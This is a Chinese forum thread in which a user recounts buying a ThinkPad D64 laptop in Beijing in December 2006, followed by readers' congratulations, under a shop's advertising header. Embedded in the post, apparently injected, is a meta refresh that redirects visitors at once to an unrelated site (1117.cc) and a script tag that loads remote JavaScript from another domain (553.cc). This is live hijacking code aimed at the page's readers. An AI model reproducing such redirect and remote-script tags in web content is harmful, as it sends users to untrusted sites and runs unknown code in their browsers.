开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 过程曲折的D64购机日记(带图片)

从我打算买笔记本到现在已经有1年多的时间了,这期间我对于目标的选定也是变更了好多次。自从我接触了XY,买一部小黑成了我这段时间最迫切的愿望。经过一年多的了解,我从一个潜水员到开始发言,再到达到200贴,我向着我的目标逐步迈进。终于在2006年即将成为过去之际,我做好了所有的准备工作,在圣诞节前夕奔向了XY
1224,天气不错。拉上同宿舍的哥们,按计划路线来到了朝阳门。先在永和大王吃了早餐,然后去旁边的建行取钱。进了银行,OH MY GOD,这家该死的建行竟然搬迁了,真是不怕意外,就怕万一。这个情况完全没有考虑到,于是马上用手机搜索这附近的建行的位置。浪费了不少时间终于在朝外大街的另一家建行取了钱,打了个的士,用最快的速度来到了XY的新家。
这个地方比以前的要好找一些,起码在路边就可以看见天晨大厦。进了XY,看见很多熟悉的面孔,也有陌生的,可能是新来的版主吧。表明来意,要买D64MM说没货了。我差点当场晕倒。没有这么背运的了,前一天晚上我刚打过电话问过,没想到一晚上就卖没了。D64实在是太受欢迎了,我想可能是英雄所见略同吧。白跑了一趟,我这心那,哇凉哇凉的啊,MM看我着急,跟我说今天晚上可能会到货,不过今天是提不了,只能明天了。为了明天能拿到货,我先交了定金,走人吧。
拉着别人来的,不能让人家饿着肚子回去啊,于是我们俩又去吉野家吃了午饭。没买到小黑,我是一点胃口也提不起来,稀里糊涂的吃完了。回家吧,刚走到地铁口,突然手机响了,陌生号码,接了,是XYMM,说D64到了。我简直又差点晕倒。今天虽然是上帝的生日前夕,上帝也不用和我开这种玩笑啊。带着极度兴奋的心情,我又来到了XY,废话少说,拿来机器,开箱,验机,简单看看屏幕,没什么问题,其他的东西懒得验了,既然来到XY,就是信任他的信誉,我相信XY不会偷换配件的。MM问用不用做系统,这点小事我自己还是搞的定的,于是关机。提出我的其他要求,选B套餐,加512拆机内存,买了原装小黑鼠和鼠标垫,东西齐了,装箱,交钱。心里这个美啊,无法用语言形容了,只能用“哈哈哈哈哈哈哈,嘿嘿嘿嘿嘿黑”来表达,没想到今天我先悲后喜,终于完成了任务。
先说到这吧,贴几张照片吧,别人的相机,用着不太习惯,拍照的效果一般,过段时间上评测。

+400---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 400 原创内容

谢谢发贴分享!!!!
双肩包好漂亮的呀..
幸亏请人吃了顿饭
电脑,手机,还有森海的耳机都是我喜欢的啊
很爽的哦!
这一套真是挺完美的,新款豪华双肩包,原装鼠标,原装鼠标垫
跟我同一天买的!哈哈
恭喜,好机
想买双剑报!!!!!!!!!!!!!!!!!!!
图片  清楚
呵呵 有M的兄弟,装备齐全的说!D64的阵营挺大的!
那个桌子多少钱?
看见两瓶辣酱
不错 双肩包有点眼红
原帖由 ylr5693042 于 2007-1-15 21:53 发表
看见两瓶辣酱

都过期了
好东东。不错。恭喜楼主了。
是曲折。
恭喜楼主,心爱的东西到手了,好羡慕马上出手
上帝总是在开玩笑
那个包是不是最新的那个双肩包呢
不知道好用不?
双肩包挺漂亮。。。
鼠标垫不错呀,树脂的?xy有买么?
咳,好事多磨